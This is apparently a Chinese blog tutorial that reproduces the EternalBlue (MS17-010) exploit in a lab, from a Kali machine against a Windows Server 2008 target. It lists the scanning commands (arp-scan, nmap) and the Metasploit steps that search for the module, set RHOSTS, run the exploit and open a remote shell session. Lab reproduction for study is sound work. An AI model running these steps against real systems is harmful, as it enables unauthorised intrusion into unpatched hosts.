永恒之蓝漏洞复现(ms17-010)

永恒之蓝漏洞复现(ms17-010)
环境
信息收集
先扫描目标靶机IP
进入MSF查看是否存在永恒之蓝的漏洞
攻击

永恒之蓝漏洞复现(ms17-010)

环境

攻击机:kali

靶机:Windows Server 2008

信息收集

对ip进行收集开放什么端口

先扫描目标靶机IP

因为在同一个内网之中

所以可以使用arp-scan -l 进行查询

fig:

知道目标靶机IP(192.168.162.146)来进行更进一步的信息收集

fig:

nmap -sV -P- 192.168.162.146

使用nmap进行192.168.162.146IP下的全端口扫描

这里可以看出系统信息为Windows Server 2008

进入MSF查看是否存在永恒之蓝的漏洞

msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3

fig:

show options

查看选项

fig:

set RHOSTS 192.168.162.146

设置目标IP

fig:

存在永恒之蓝的漏洞

返回

攻击

使用攻击模块

search ms17-010

use 0

fig:

set RHOSTS 192.168.162.146

fig:

攻击成功

fig:

输入shell

进入cmd模式

fig:

exit 退出shell
background 把shell放入后台

fig:

重新连接

sessions -i 1

fig:

posted @   安一_AA  阅读(130)  评论(0编辑  收藏  举报
相关博文:
·  Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)复现
·  MS17-010漏洞复现(永恒之蓝)
·  MS17-010(永恒之蓝)漏洞分析与复现
·  永恒之蓝攻击复现
·  永恒之蓝(MS17-010)的复现
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 写一个简单的SQL生成工具
· AI 智能体引爆开源社区「GitHub 热点速览」
· C#/.NET/.NET Core技术前沿周刊 | 第 29 期(2025年3.1-3.9)
点击右上角即可分享
微信分享提示